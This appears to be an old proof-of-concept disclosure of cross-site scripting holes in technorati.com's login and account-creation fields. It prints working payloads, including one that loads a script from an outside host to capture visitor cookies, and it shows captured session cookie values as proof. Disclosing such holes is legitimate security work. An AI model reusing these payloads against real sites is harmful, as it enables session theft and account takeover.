Technorati.com - XSS with cookie disclosure
Technorati.com
Homepage:
http://www.technorati.com
Affected files:
login box
Creating a new account input boxes
Login box XSS vuln:
By escaping quotes and using script tags, we can acomplish our XSS example. For
PoC try putting the following code in the login box:
">">">">'>'>'>"><"">">"><SCRIPT
SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<"<"<"<'<'
Screenshots:
http://www.youducktard.com/xsp/technorati1.jpg
Our cookie data:
This is remote text via xss.js located at youfucktard.com
tvisitor=34.127.0.22.1150259450857579;
TECHNORATI_MEMBER=4d5bd72bf6b2e71e5be9fa8dc3d99d7b
------------------------------------------------
Creatinga new profile input boxes:
We use the same method as above, and since the "Emailaddress" box allows more
characters then the others (
<"">">'>'><IMG SRC=javascript:alert('XSS')><"<"<'<'<"><"
Spoofing forms to create XSS:
Now, the forms to create a new account can also be spoofed, the only data that
seemsto be checked are illegal characters in usernames and email addresses.
Below are three screenshots of spoofing the create account form, the XSS
example that results in it, and the technorati.com page loading normally after.
Screenshots:
http://www.youfucktard.com/xsp/technorati3.jpg
http://www.youfucktard.com/xsp/technorati4.jpg
http://www.youfucktard.com/xsp/technorati5.jpg
Technorati profile:
http://www.technorati.com/profile/bonerbee